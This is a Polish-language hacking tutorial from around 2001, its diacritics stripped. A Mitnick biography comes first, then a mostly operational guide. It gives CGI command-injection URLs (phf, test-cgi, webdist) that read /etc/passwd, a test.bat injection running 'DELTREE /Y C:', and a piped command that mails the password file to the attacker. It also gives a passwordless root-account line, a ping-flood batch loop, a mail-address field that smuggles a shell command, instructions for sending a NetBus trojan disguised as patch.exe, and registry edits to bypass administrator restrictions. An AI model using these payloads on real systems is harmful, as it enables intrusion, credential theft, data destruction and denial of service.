Kevin D. Mitnick rozpocz swoje "komputerowe eskapady" we wczesnym wieku, gdy doczy do lokalnej gupy hackerskiej na obrzeach Los Angeles. Swoje umiejtnoci zademonstrowa poprzez wamanie si do komputera Monroe High School i zmieniajc rednie ocen. Jednak legalne kopoty zaczy si gdy wama si do komputera Obrony Powietrznej Ameryki Pnocnej w Colorado...majc 17 lat - byo to w 1981 roku...

Niedugo poniej zdoby wysokie umiejtnoci w phreakingu...jego apetyt na sprzt przecznia telefonow byl nienasycony...

eby zdoby zastrzeone informacje, ktre byy mu potrzebne Mitnick wama si do biur korporacji Pacific Bell i zagarn podrczniki komputerw oraz software na systemy komputerowe COSMOS i MicroPort...

Ze wzgldu na jego mody wiek tym razem unikna konsekwencji prawnych...

Kevin polepsza wci swoje umiejtnoci (pone lata 80'te), i unika wadz a do 1989 roku...
Agenci FBI zbierali dowody na to, e Mitnick i jego przyjaciel zwany DiCicco ukradli wysoko tajne programy komputerowe i zbiory bada z Digital Equipment Corp. Take naruszone zostao 17 wewnetrznych kodw dostepu nalece do sieci MCI. Mitnick i DiCicco zostali aresztowani... a Urzdnik Sdowy w Los Angeles nakaza trzyma Mitnicka bez moliwoci wpacenia kaucji podpierajc si argumentem:
"uzbrojony w klawiatur jest zagroeniem dla bezpieczenstwa publicznego"...

Asystent Rzecznika Stanw Zjednoczonych powiedzia: "osoba ta jest bardzo niebezpieczna i musi by trzymana z dala od komputera".
Detektyw James K. Black, gowa wydziau przestpstw komputerowych w Departamencie Policji w Los Angeles powiedzia o Mitnicku "on jest kilka poziomw wyej, ni kada osoba, ktr nazywacie hackerem komputerowym". W wieku 25 lat Mitnicka skazano na roczny pobyt w wizieniu o mninimalnym rygorze.
Sdzia ktry go skazaa bya Mariana R. Pfaelzer. Jego przyjaciel DiCicco wiadczy przeciwko niemu...
by to rok 1989. Sdzia Pfaelzer nakazaa take Mitnickowi na regularne uczszczanie na sesje rehabilitacyjne opowiadajc si na jego oddanie do waman komputerowych niczym naduywanie jakiej substancji.
Federalni osakrzyciele take przedstawili rozkaz zabronienia Mitnickowi dostpu do przywileju telefonowania w chwili gdy znajduje si on w wizieniu. Zrobili to ze strachu przed tym, e mogby zdoby dostp do 
komputerw na zewnatrz. 

Harriet Rosetto, dyrektor oddziau rehabilitacyjnego mowi: "hacking daje Kevinowi szacunek w sieci...co czego nie mia w normalnym wiecie. Nie kierowa si sabotaem lub chciwoci... on jest jak due dziecko grajce w Dungeons & Dragons...".

Rok poniej Mitnick zosta wypuszczony z zakadu a przydzielono mu oficera opiekuczego. Raporty donosza o dziwnych rzeczach...telefon oficera, ktry go pilnowal zostal odczony, a firma telefoniczna nie miaa go w zapisach. Take zapis karty kredytowej sedzi w TRW inc. zosta niewytumaczalnie skasowany. Ponadto zapisy dotyczce aresztowania Mitnicka znikny z komputerow sdowych... Mitnick wykiwa kuratora i uciek z kraju aby odwiedzi kolegw hackerow w Israelu... znowu wpad w kopoty. Gdy wraca do USA agenci FBI dopadli go w jego rezydencji w Padzierniku 1992 r.

Mitnicka oskarono o zamanie nakazu sdu, oraz o wamanie si do komputerow Kalifornijskiego Departamentu Maszyn Spalinowych. Autorytety take wierzyy, e by on odpowiedzialny za zamanie systemu  komputerowego Armii, oraz za nieautoryzowany dostp do zapisw FBI - jeszcze jeden przykad do ktrego wykorzystane zostay ulubione techniki Kevina. 

W Grudniu 1992 roku Kevin Mitnick znikn z powierzchni ziemi...znowu cigany przez wiele wadz federalnych.
Zostawiajc szlak podpowiedzi zaraz za nim przez nastepne dwa lata agenci FBI wierzyli, ze Mitnick prosto stworzy serie faszywych identyfikacji. Uzbrojeni w jego wiedz i umiejetnosci zapanie go bdzie proste...

Jego osoba wzbudzia ponowny alarm w rodku 1994, gdy Motorola's Cellular Division zgosia, e kopie ich programw zostaly zabrane z przypitego do sieci komputera. Dan Farmer, twrca "SATANA", programu ktry szuka saboci sieci komputerowych powiedzia, e kto wama si do jego komputera i ukrad wczesn wersj tego programu. Techniki zastosowane byy typowe dla Kevina Mitnicka...

25 Grudnia 1994 roku, w dzie wiat straszna wiadomo dosza do Tsutomu Shimomury, experta w dziedzinie zabezpiecze w Narodowym Centrum Superkomputerw w San Diego.

Shimomura by wanie na wakacjach w Nevadzie. Jego osobisty komputer, podpity przez internet do Centrum Superkomputerow zosta spenetrowany. 
Jak to si mogo sta jednemu z najwikszych specw w dziedzinie bezpieczestwa w kraju?.... wstyd przed wszystkimi! Osobista skrzynka gosowa Shimomury zostaa take skompromitowana 27 Grudnia tego samego
roku...nagrany, bezczelny glos mwi "Niech ci diabli! Moja technika jest najlepsza... Nie wiesz kim jestem? ... Ja i moi przyjaciele... Zabijemy ci!". Take slycha byo gosy dwch innych ludzi na nagraniu...jeden z gosw mowi "ok szefie, twoje kung-fu jest calkiem nieze" - kpiac sobie z narodowosci Shimomury...

Gazety na caym wiecie zostay zasypane historyjkami o nowej technice omijania zabezpiecze nazywanej "Protocol Spoofing" - czyli podszywaniem si pod protokoy... Gdy Shimomura odkry sposb wamania bezwocznie powiadomi innych o tej technice. Intruz (Kevin Mitnick) najpierw wszed do zaufanego komputera Uniwersytetu Laylola w Chicago, ktry mia autoryzowany dostp do plikw dostepu komputera Shimomury w Kalifornii.
Komendy przesyu danych zostaly wysane z "zaufanego" rda eby zdoby dostp do tysicy wysoko tajnych programw zabezpieczajcych na komputerze Shimomury. Kiedy zas to miao miejsce Mitnick przenis dane na konto w "Studni" - duego providera Internetowego. Take zabra i zmagazynowa 20,000 kart kredytowych i konto w NetCom Inc..., wiele nalecych do milionerw "silikonowej doliny". Operator systemu "Studni" zanotowa nagy wzrost liczby danych na koncie, ktre zwykle byo puste. Bruce Koball, programista dla Freedom and Privacy Group,
jeden z wacicieli konta zosta powiadomiony o napywie danych i poproszony o ich sprawdzenie...
Koball by zszokowany, gdy znalazl pliki Shimomury, i skontaktowa si z nim w bardzo krtkim czasie.

Wadze federalne zostay powiadomione, gdy odnaleziono numery kart kredytowych, i wtedy Shimomura gotw by do swojej zemsty. Bazy danych FBI dostarczyy list moliwych podejrze, ktrymi mona by obciay Mitnicka, lecz Kevin D. Mitnick by tylko jednym na szczycie listy. Jego wamanie byo postrzegane jako "zabawa", bez chci
wyrzdzenia szkd finansowych...wtedy FBI umiecio go na szczycie listy - ponad wszystkimi innymi...
Jedna z "elaznych zasad" Kevina byo nie trzymanie obciaajcych danych na wasnej maszynie. Inne doniesienia mwia, e na koncie zostay znalezione take oprogramowanie skradzione z Motorola Cellular Division.


Shimomura, prywatnie omieszony i obraony, po naruszeniu reputaci rozpocz zastawianie puapki na intruza...
Pierwsze co zrobi, to zgra gos intruza i udostepni go w internecie dla wszystkich...wiedzia, e to go zdenerwuje, e w koncu zdecyduje si "pokn haczyk" jeli jego ego zostanie naruszone - to miao w kocu przyprowadzi go do niego... Nastpnie 24 godzinne monitorowanie zostao zaoona na "Studni", wraz z uzbrojon eskadr z FBI i Narodowej Agencji Bezpieczestwa...Shimomura cierpliwie czeka, kiedy bandyta wrci i kilka razy przeszed przez system. Pulapka podziaa...Mitnick pokn haczyk... Na skrzynk gosowej Shimomury
zostaa przesana wiadomoci, na ktrej gos mowi "Ah Tsutomu, mj wyksztacony uczniu... widz e umiecie mj gos na sieci... jestem bardzo rozczarowany mj synu...".

Ostronie ledzc kady z atakw, Shimomura i jego zaoga expertw wraz z Kentem Walkerem byli w stanie namierzy intruza. Mitnick zdawa si by w Colorado, ale z umiejtnociami tego typu cieko byo powiedzie. Experci obserwowali kade wamanie, i stao si jasne, e system zabezpieczen "Studni" zosta powanie skompromitowany...
"Studnia" zmienia system na nowy Sun SPARC 100E ze wzgldu na zaistniay incydent.

14 Lutego 1995 roku wadze namierzyy ich objekt podejrze w Releigh, w Pnocnej Karolinie.
Z pomoc technikw z Sprint Cellular, uzbrojeni w monitory czstotliwociowe dotarli do apartamentu na Players Court niedaleko lotniska Raleigh Durham. Federalni zaczaili si na lokatora... oczywicie znanego pod innym nazwiskiem... ale jednak Kevina D. Mitnicka...

Mitnick zosta ofiar swego wasnego ego. By ju poszukiwany w Kalifornii za wamanie do koncernu motorniczego...
Podda si bez oporu agentom FBI i rodku nocy. Zosta aresztowany 15 Lutego 1995 roku. Jego komputery, oprogramowanie, ksiki, notatki i sprzt telefoniczny zosta skonfiskowany...wszystko jako dowody. Wadze wpady w zachwyt, gdy odkryy motody ktrymi Mitnick wamywa si do ich systemu. Jego modem by wykorzystywany do czenia si z serverem Spring Cellular na odwroconych kanaach, ktre zwykle wykorzystywane byy do komunikacji z objektu mobilnego do bazy. Mitnick wtedy czy si z biurem poczen GTE, i przekierowywa swj telefon do
Kolorado, gdzie czy si z poczeniem internetowym NetCom. To sprawiao, e namierzenie byo niemale niemoliwe nawet dla najlepszych ekspertw. W internecie Mitnick mg czy si z tysicami komputerw na caym wiecie.

Shimomura i Mitnick spotkali sie po raz pierwszy na sali sdowej w Raleigh w Polnocnej Karolinie. Mitnick popatrzy na Shimomure i powiedzia "Cze Tsutomu, respektuje twoje umiejtnoci", na co Shimomura symbolicznie ukoni gowe.

Na Pitej Konferencji Komputerw, Wolnoci i Prywatnoci, ktra odbya si 28 Marca 1995 roku w Burlingame w Kaliforni Kevin Mitnick by gorcym tematem rozmw na temat wysoko-poziomowych zabezpiecze komputerowych.
Jeden z uczestnikw porwna Mitnicka do twrcy Sputnika, bo on tak samo jak Rosjanie wyprzedzili USA w wycigu o loty w kosmos, wyprzedzi narodowe bezpieczenstwo komputerowe...

Nazwany "Computerowym terroryst" przez Departament Sprawiedliwoci, Mitnick sta si tematem wielu ksiaek, artykuw, i filmw wczajc "Gry Wojenne" i przebj "Jonny Mnemonic". 10 Lipca 1995 roku zosta postawiony przed sdem i oskarony o zamanie 23 federalnych paragrafw wczajc np. nielegalny dostep do telefonu, kradzierz tajnych danych, naruszenie bezpieczestwa narodowego. Naley wspomnie e za kady powinien otrzymac kar 20 lat wizienia. 

31 Marca 1996 rozpocza si masywna akcja sieciowa w walce o uwolnienie K.Mitnicka.

Ta akcja bdzie trwaa, pki nasz przyjaciel Kevin nie zostanie puszczony wolno...

<----dokadnie zernite z innego FAQ---->

----------------------------------------------------------------------------------------------
Jak znaj komputer do wamania, o ktry nam chodzi ?

Istniej na to trzy sposoby:
1.Bierzemy om i wkradamy si do naszego celu. Gdy bdziemy w rodku bierzemy PC pod pache i wyskakujemy przez
  okno. Nastpnie w domu rozpracowujemy system przy uyciu motka.
2.Wchodzimy do netu i szukamy programw Autoscan lub A-Dial
3.Sprawdzamy po kolei wszystkie dostpne numery IP

Dla ciemnych podam, e punkt nr. 1 to tylko art !!!
Sposb nr. 3 jest skuteczny, ale moe nam nie starczy ycia, aby znale komputer... ;)
Dlatego te omwie sposb nr. 2:

Autoscan i A-Dial to tak zwany "prefix scanrer". (znay rowniez po nazwa War Dialer). 
Jest to progrma ktory automatycznie wybiera numer zaczynajacy sie
trzema nemerami (prefix'em) ktory wybrales. Spawdza on muner polaczenia posrednika.
(seria beep'ow ktore mowia, ze polaczyles sie z komputerem). Sprobuj i znajdz
duze biznesowe pole prefix'ow do sprawdzenia. Biznes ma interesujace komputery.
Programy te, sa proste w uzyciu i czyni prace efektywna i szybka.
----------------------------------------------------------------------------------------------
Gdy wamujesz si na jak stronk, powiniene wiedzie w jakim kraju ley serwer na ktrym ona jest.
W tym wanie celu podaje domeny rnych krajw:

AD - Andorra - Andorre
AE - Imarata al Arabiya al Muttahidah - United Arab Emirates
AF - Afghanistan - Afghanestan
AG - Antigua and Barbuda
AI - Anguilla
AL - Shqip&euml;ria - Albania
AM - Armenia - Hayastan
AN - Netherlands Antilles - Nederlandse Antillen
AO - Angola
AQ - Antarctica
AR - Argentina
AS - American Samoa
AT - Austria - Osterreich
AU - Australia
AW - Aruba
AZ - Azerbaijan - Azerbaycan
BA - Bosnia and Herzegovina - Bosna i Hercegovina
BB - Barbados
BD - Bangladesh
BE - Belgium - Belgique - Belgie
BF - Burkina
BG - Bulgaria
BH - Bahrain - Bahrayn
BI - Burundi
BJ - Benin
BM - Bermuda
BN - Brunei
BO - Bolivia
BR - Brazil - Brasil
BS - Bahamas
BT - Bhutan
BV - Bouvet Island - Bouvetoya
BW - Botswana
BY - Belarus - Byelarus'
BZ - Belize
CA - Canada
CC - Cocos (Keeling) Islands (Australia)
CF - Central Africa
CG - Congo
CH - Switzerland - Schweiz - Suisse - Svizzera - Svizra - Helvetia
CI - Cote d'Ivoire
CK - Cook Islands
CL - Chile
CM - Cameroon
CN - China
CO - Colombia
CR - Costa Rica
CS - Czechoslovakia
CU - Cuba
CV - Cape Verde - Cabo Verde
CX - Christmas Island (Australia)
CY - Cyprus
CZ - Czech Republic - Cechy
DD - Germany - Deutschland
DE - Germany - Deutschland
DJ - Djibouti
DK - Denmark - Danmark
DM - Dominica
DO - Dominican Republic - Republica Dominicana
DZ - Algeria - Jaza'ir
EC - Ecuador
EE - Estonia - Eesti
EG - Egypt - Misr
EH - Western Sahara
ER - Eritrea
ES - Spain - Espana
ET - Ethiopia - Ityop'iya
FI - Finland - Suomi
FJ - Fiji
FK - Falkland Islands
FM - Micronesia
FO - Faroe Islands - Faroyar
FR - France
FX - Metropolitan France
GA - Gabon
GB - United Kingdom
GD - Grenada
GE - Georgia - Sak'art'velo
GF - French Guiana - Guyane
GH - Ghana
GI - Gibraltar (UK)
GL - Greenland - Kalaallit Nunaat
GM - The Gambia
GN - Guinea - Guinee
GP - Guadaloupe (France)
GQ - Equatorial Guinea - Guinea Ecuatorial
GR - Greece - Ellas
GS - South Georgia
GT - Guatemala
GU - Guam
GW - Guinea-Bissau - Guine-Bissau
GY - Guyana
HK - Hong Kong (UK)
HM - Heard Island and McDonald Islands (Australia)
HN - Honduras
HR - Croatia - Hrvatska
HT - Haiti
HU - Hungary - Magyarorszag
ID - Indonesia
IE - Ireland - &Eacute;ire
IL - Israel - Yisra'el
IN - India - Bharat
IO - Indian Ocean Territory (UK)
IQ - Iraq
IR - Iran
IS - Island - Iceland
IT - Italy - Italia
JM - Jamaica
JO - Jordan - Urdun
JP - Japan
KE - Kenya
KG - Kyrgyzstan
KH - Cambodia - Kampuchea
KI - Kiribati
KM - Comoros - Comores
KN - Saint Kitts and Nevis
KP - Korea - Choson
KR - Korea
KW - Kuwait - Kuwayt
KY - Cayman Islands
KZ - Kazakhstan
LA - Laos
LB - Lebanon - Lubnaniyah
LC - Saint Lucia
LI - Liechtenstein
LK - Sri Lanka
LR - Liberia
LS - Lesotho
LT - Lithuania - Lietuva
LU - Luxembourg
LV - Latvia - Latvija
LY - Libya - Libiya
MA - Morocco - Maghrib
MC - Monaca
MD - Moldova
MG - Madagascar
MH - Marshall Islands
MK - Macedonia - Makedonija
ML - Mali
MM - Burma - Myanma
MN - Mongolia - Mongol Uls
MO - Macau
MP - Northern Mariana Islands
MQ - Martinique (France)
MR - Mauritania - Muritaniyah
MS - Montserrat
MT - Malta
MU - Mauritius
MW - Malawi
MY - Malaysia
MZ - Mozambique - Mocambique
NA - Namibia
NC - New Caledonia - Nouvelle-Caledonie
NE - Niger
NG - Nigeria
NI - Nicaragua
NL - Netherlands - Nederland
NO - Norway - Norge
NP - Nepal
NR - Nauru
NU - Niue
NZ - New Zealand
OM - Oman - Uman
PA - Panama
PE - Peru
PF - French Polynesia - Polynesie Francaise
PG - Papua New Guinea
PH - Philippines - Pilipinas
PK - Pakistan
PL - Poland - Polska
PM - Saint-Pierre et Miquelon
PN - Pitcairn Islands
PR - Puerto Rico
PT - Portugal
PW - Palau - Belau
PY - Paraguay
QA - Qatar
RE - Reunion
RO - Romania
RU - Russia - Rossiya
RW - Rwanda
SA - Saudi Arabia - Arabiya as Suudiyah
SB - Solomon Islands
SC - Seychelles
SD - Sudan
SE - Sweden - Sverige
SG - Singapore - Singapura
SH - Saint Helena (UK)
SI - Slovenia - Slovenija
SJ - Svalbard og Jan Mayen
SK - Slovakia - Slovensko
SL - Sierra Leone
SM - San Marino
SN - Senegal
SO - Somalia
SR - Suriname
ST - Sao Tome e Principe
SU - Soviet Union - Sovietskiy Soyuz
SY - Syria - Suriyah
SZ - Swaziland
TC - Turks and Caicos Islands
TD - Chad - Tchad
TF - Southern and Antarctic Lands - Terre Australes et Antarctiques
TG - Togo
TH - Thailand
TJ - Tajikistan - Tojikiston
TK - Tokelau (New Zealand)
TM - Turkmenistan - Tiurkmenostan
TN - Tunisia - Tunis
TO - Tonga
TP - Timor
TR - Turkey - Turkiye
TT - Trinidad and Tobago
TV - Tuvalu
TW - Taiwan - T'ai-wan
TZ - Tanzania
UA - Ukraine - Ukrayina
UG - Uganda
UM - United States Minor Outlying Islands
US - United States of America
UY - Uruguay
UZ - Uzbekistan - Uzbekistan
VA - Holy See
VC - Saint Vincent and the Grenadines
VE - Venezuela
VG - Virgin Islands (UK)
VI - Virgin Islands (USA)
VN - Vietnam - Viet Nam
VU - Vanuatu
WF - Wallis et Futuna
WS - Samoa
YD - Yemen
YE - Yemen
YT - Mayotte (France)
YU - Yugoslavia
ZA - South Africa
ZM - Zambia
ZR - Zaire
ZW - Zimbabwe
*********************************************************************
2)
ATAK NA SERWER I: (ta metoda ju chyba nie dziaa...)
Oto polecenia suce do wamywania si na strony WWW (szansa 5%):
P.S Nalerzy je wpisa w miejsce adresu... :)

http://www.adres_strony.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
http://www.adres_strony.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd
http://www.adres_strony.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd 
http://www.adres_strony.com/cgi-bin/php.cgi?/etc/passwd
http://www.adres_strony.com/~root/etc/passwd
http://www.adres_strony.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna me=&Qoffice_phone=
http://www.adres_strony.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname= haqr&Qemail=&Qnickname=&Qoffice_phone=
http://www.adres_strony.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd 
       %0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://www.adres_strony.com/~nazwa_uzytkownika/passwd
http://www.adres_strony.com/cgi-bin/wrap?/../../../../../etc
http://www.adres_strony.com/~bin/etc/passwd
http://www.adres_strony.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

POLECENIA DO HACKOWANIA IRIX'A: (15% szans)
http://www.adres_strony.com/cgi-bin/wrap?/etc        
http://www.adres_strony.com/cgi-bin/webdist?distloc=;cat%20/etc/passwd
http://www.adres_strony.com/cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download

P.S Z mojego (skromnego) dowiadczenia wynika, e ta ostatnia linijaka na dzie dzisiejszy (wrzesien 2001) dziaa w
    Polsce tylko na serwery:
    www.radio.opole.com.pl & www.perytnet.pl

W ten spposb z serwera mona pobra KADY plik jaki jest nam "potrzebny": (szansa 10%)
http:///www.adres_strony.com/cgi-bin/php.cgi?/plik/do/przejrzenia

SPOSOBY WAMA NA SERWERY WINDOWS NT: (dziaa na 80% serwerw na ktrych jest NT)
Wystarczy w przegldarce wpisa:
http://www.adres_strony.com/cgi-bin/test.bat?&XXX
UWAGA: w miejsce XXX wstawiamy dowolne polecenie DOS'a np: "DELTREE /Y C:" ;)


Istnieje te znana dziura w stronach zrobionym przez Frontpage <2.0 (szanas 2%)
Wystarczy wej na:

www.adres_strony.com/_vti_prt/service.pwd
www.adres_strony.com/~user/_vti_prt/service.pwd

ATAK PRZEZ TELNET: (szansa 10% [tym sposobem], przy uzyciu exploitow jakies 30%)
To najpopularniejszy sposb, posiadajcy jedn znaczn wade:
Musimy mie konto na serwerze na ktry si wamujemy.
Wystarczy wpisa w Start>Uruchom...
TELNET <ofiara> <ewaentualny numer portu> [ENTER]
Po pewnym czasie pokae si proba o login & haso, wpisujemy je i piszemy komende:
CAT /ETC/PASSWD (to wyswietli na ekranie zawartosc pliku z haslami)
Ten sposob jest jenak niewygodny, czy nie lepiej wpisac:
CAT /ETC/PASSWD | mail nasz@falszywy.adres (dostaniemy ten pliczek prosto do skrzynki pocztowej)

P.S Ostatnio udao mi si wama na fedworld.gov (maj tam fajne dokumenty rzdowe)
    Chce si mia jak powiem, e wamaem sie tam podajc jako login NEW i haso zostawiem PUSTE
    Po prostu utworzyo nowego USER'a !!!
    >>> Aby takiech serwerw byo wicej

P.S Gdy jestemy na swoim koncie, moemy na nim uruchomi exploita, dziki ktremu staniemy si ROOT'em
    Exploity najlepiej bra ze "zbrojowni hackerskiej" (tak ja nazywam to miejsce) == www.rootshell.com ==

ATAK PRZEZ FTP:  (szanas 3%)
Uruchamiamy sobie programik FTP (tekstowy) i wchodzimy na adres ofiary np: FTP.LAMER.ORG
Jako login podajemy: ANONYMOUS lub FTP, a jako haso wpisujemy adres email kolegi ktrego nie lubimy
(wszystko bdzie na niego), czasami zamiast adresu e-mail mozemy wpisac sam znaczek @.
Gdy juz bedziemy na serwerze wpiszmy:
GET /ETC/PASSWD
Niestety ta metoda dziala tylko na BARDZO lamerskich serwerach

P.S Na niektrych serwerach FTP mona uruchomi exploita !!!


CIEKAWOSTKA: (szanas 5%)
-Zdarza sie ze w niektorych banerach <stat4u> jest haslo usera (wystarczy poszukac - wziasc wlasciwosci 
 na banerze i szukac) miego szukania... ;)

UWAGA: (ta dziura dziaa na 5%)
Istnieje znana dziura w systemie, pozwalajca na przegldanie katalogu CGI-BIN, 
wystarczy wpisa w przegldarce: 
http://www.adres_strony.com//cgi-bin/
(pamitaj, e przed cgi-bin musz by dwa "//")

P.S Jeli dostaniemy si do danego pliku, moemy pobawi si w rozkodowywanie hase,
    lub posuy si nieco lamersk technik... wystarczy utworzy dodatkowego admina !!!
    Wystarczy tylko w pliku PASSWD dopisa tak linijk:
    hack::0:0:/:/bin/bash
    W ten sposb jeli zalogujemy si do systemu i jako login podamy HACK, nie bdziemy pytani o haso.
    Poza tym bdziemy mieli prawa administratora

P.S Jeli dostaniemy si do pliku PASSWD, to bd w nim zapisane hasa wszystkich uytkownikw.
    Niestety hasa te s zakodowane, wic naley je odkodowa. Najlepszym programem do tego
    celu jest John The Ripper (najlepiej wersja 1.51, ja wanie takiej uywam)
    Jak kto nie wie skd wzi JTR 1.51, to niech poszuka w Internecie (jest na wszystkich
    DOBRYCH stronach hackerskich) programik ten zajmuje: 0.5 MB (ZIP)
    UWAGA: Jesli nie masz slownikow do tego programu, to koniec zabawy...
           Bez slownikow nie zlamiesz raczej zadnego hasla...
           Dobry slownik powinien miec okolo 60 MB czystego TXT !!!

*********************************************************************
3)
ATAK NA SERWER II:
Oto sposb dziaajcy na 10% (musimy tylko zna system na jaki si wamujemy):

http://www.adres_strony.com/cgi-bin/phf?Qalias=j00%ffcat%20XXX

W miejsce XXX wstawiamy (zalenie od atakowanego systemu):

SYSTEM:                    FOLDER:
AIX 3                      /etc/security/passwd  lub  /tcb/auth/files//
A/UX 3.0s                  /tcb/files/auth/?/                   
BSD4.3-Reno                /etc/master.passwd                   
ConvexOS 10                /etc/shadpw                          
ConvexOS 11                /etc/shadow                          
DG/UX                      /etc/tcb/aa/user/                    
EP/IX                      /etc/shadow                          
HP-UX                      /.secure/etc/passwd                  
IRIX 5                     /etc/shadow                          
Linux                      /etc/shadow                          
OSF/1                      /etc/passwd[.dir|.pag]               
SCO Unix #.2.x             /tcb/auth/files//
SunOS4.1+c2                /etc/security/passwd.adjunct         
SunOS 5.0                  /etc/shadow
System V Release 4.0       /etc/shadow                          
System V Release 4.2       /etc/security/* database
Ultrix 4                   /etc/auth[.dir|.pag]                 
UNICOS                     /etc/udb   
*********************************************************************
4)
ATAK NA SERWER III:

Ten rozdia nie pokazuje (niestety) jak pobra hasa z serwera, lecz jak zawiesi jaki lamerski serwer.
Mona uy takiego pliczku wsadowego:

<----kod programu---->
:go
ping -l 65500 -s 1 %1
goto go
<----kod programu---->

Jako parametr przy wywoywaniu tego programu, naley poda numer IP komputera, lub adres internetowy.
Osoba ta zostanie zawalona takimi ilociami PING'w, e albo zawiesi jej si komputer, albo sam zrobi RESET.
Ja sprawdzalem ten sposob w szkole, ale ten programik chodizl mi w tle przez jakies 30 sekund i dopiero pozniej 
zresetowal komputer (przypadkowo wybranemu) koledze

P.S Aby zawiesi jaki serwer musisz uruchomi ten program wraz z kolegami np:
    Onet.pl zawieszono przy uyciu ponad 100 komputerow z programami pracujcymi na tej zasadzie...

*********************************************************************
5)
Jak przeglda cudz poczt... :)

Jest to zadanie niezwykle proste, ale niektre (nowsze) serwery s przed nim zabezpieczone.
UWAGA: ten list NIE moze byc wyslany przez Outlook Express, bo on uzna ze ten adres jest nieprawidlowy
       musimy go wyslac z LINUX'a lub jak ja to robie: przez telenet z jakiegos SMTP

Wystarczy wyslac do ofiary "specjalny list BOMBE". W miejscu adresu wystarczy wpisac:

ofiara@domena.pl ; /bin/mail twoj_email@domena.com < etc/passwd

NP:
kazik123@lamer.org ; /bin/mail hacker@poczta.onet.pl < etc/passwd

Po wysaniu takiego listu, na twoim koncie pocztowym pokae si wiadomo o tytule:
"DEAMON <jaki tam serwer> SEND...cotam" a w treci listu zobaczysz haso i login do atakowanego 
konta+ kilka ciekawych informacji takich jak: data utworzenia konta, WSZYSTKIE dane 
podane przy zakadaniu konta (imie, nazwisko, data ur., adres, telefon itp.), ilo
listw znajdujcych si na koncie i... czego dusza zapragnie !!!


Tre i temat listu mog by dowolne, ale uwaga:
OSOBA TA OTRZYMA TEN LIST I BDZIE WIEDZIE E TO TY PODBIERASZ JEJ POCZTE.
DLATEGO TE POLECAM WYSLAC TEN LIST W NASTPUJCY SPOSB:
 - Od kolegi :(
 - Ze szkoy
 - Z domu przy uyciu programu do ANONIMOWYCH_MAILI
----------------------------------------------------------------------------------------------
WYSYANIE TROJANA

Wiele osb pyta mnie, czy da si napisa taki email, by zaraz po jego przeczytaniu na komputerze
ofiary uruchomi si np. NETBUS. Pomylicie pewnie: Mona by wysa go jako zacznik !!!
Metoda ta nie jest najlepsza, niektrzy lamerzy nie otwieraj zacznikw...
Polecam metode, ktr nazwaem: "OTWIERANIE NA CHAMA"
Polega ona na odpowiednim spreparowaniu listu, tak, aby po jego otwarciu lub - w przypadku
Outlook Expressa - podwietleniu go uruchomi si trojan...
Sprawa jest banalna oto co naley zrobi:

1.Otwieramy Outlook Express
2.Piszemy jaki list do lamera i adresujemy go odpowiednio
3.Kopiujemy ten list na pulpit
4.Klikamy na niego prawym klawiszem trzymajac przy tym SHIFT i wybieramy "Otwrz z..."
5.Otwieramy go z notatnika
6.Zmieniamy nagwek w ten sposb:

<----Kod programu---->

------=_NextPart_000_000C_01C11355.D9D13940 
Content-Type: application/x-msdownload; 
name="patch.exe" 
Content-Transfer-Encoding: base64 
Content-Disposition: attachment; 
filename="patch.exe" 

Tutaj musisz wstawic zawartosc pliku EXE
------=_NextPart_000_000C_01C11355.D9D13940--

<----Kod programu---->
7.Zapisujemy plik
8.Przenosimy go do skrzynki nadawczej
9.Wysyamy
10.Bawimy si np. NetBusem... ;)
*********************************************************************
6)
Zabezpieczenie POLEDIT'a:

POLEDIT czyli "Edytor zaoe systemowych", to jeden z najprostszych
programw zabezpieczajcych. Jego wad jest to, e nawet przy maksymalnych
zabezpieczeniach naoonych przez administratora systemu, istnieje moliwo
zmiany konfiguracji zabezpiecze (!)
Jedyne co musimy zrobi, to wybra START>URUCHOM... i w okienku wpisujemy POLEDIT
Nastpnie wybieramy z paska menu pierwsz opcje (nie pamitam nazwy, ale to chyba FILE),
nastpnie wybieramy OPEN REGISTRY... po tych czynnociach, okienko POLEDIT'a powinno sta si
biae i powinno zawiera ikone komputera i czowieka. Aby usun WSZYSTKIE zabezpieczenia
klikamy dwukrotnie na ikone "UYTKOWNIK DOMYLNY" wybieramy pierwsz opcje od dou, nastpnie
znowu pierwsz od dou i na koniec odznaczamy kwadracik przy DISABLE TOOL EDITING REGISTRY
(lub co w tym rodzaju). Nastpnie naciskamy <OK> Wybieramy opcje ZAPISZ (SAVE) i... zamykamy
program. Nastpnie uruchamiamy program REGEDIT (w ten sam sposb co POLEDIT)
i kasujemy WSZYSTKO (poza wartoci domyln) z kluczy:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]

UWAGA: Niektre zmiany wymagaj ponownego uruchomienia komputera !!!

+++++++++++++++++++++++
+ Szczeglne sytuacje +
+++++++++++++++++++++++

Czasami zdarza si, e w komputerze s zabezpieczenia ktrych nie moemy w ten sposb omin.
Oto kilka przykadw takich sytuacji, wraz z ich rozwizaniem:

A) Gdy klikam na "Mj Komputer" nie widz dysku C: !!!
   Aby to omin wystarczy utworzy na pulpicie skrt z poleceniem FILE://

B) Na moim dysku nie ma POLEDIT'a, a Edytor Rejestru jest zabezpieczony !!!
   Wystarczy utworzy na pulpicie plik tekstowy z rozszeeniem REG (np. hack.reg)
   A jako tre pliku wpisa:

-------/ KOD PROGRAMU /-----

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

-------/ KOD PROGRAMU /-----

Po utworzeniu takiego pliku, wystarczy go uruchomi :)

C) Nie mam dostpu do panelu sterowania !!!
   Wystarczy utworzy nowy folder o nazwie:
   Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D} 

